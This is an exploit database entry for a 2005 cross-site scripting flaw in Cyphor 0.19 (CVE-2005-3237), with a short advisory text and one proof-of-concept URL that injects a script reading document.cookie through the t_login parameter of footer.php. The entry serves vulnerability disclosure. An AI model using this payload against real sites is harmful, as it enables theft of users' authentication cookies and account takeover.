Cyphor 0.19 - 'footer.php?t_login' Cross-Site Scripting
Author: retrogod@aliceposta.it
type: webapps
platform: php
port:
date_added: 2005-10-08
date_updated: 2013-06-20
verified: 1
codes: CVE-2005-3237;OSVDB-19946
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/15047/info
Cyphor is prone to multiple cross-site scripting and SQL injection vulnerabilities.
Exploitation could allow for theft of cookie-based authentication credentials or unauthorized access to database data. Other attacks are also possible.
http://www.example.com/[path]/include/footer.php?t_login=<script>alert(document.cookie)</script>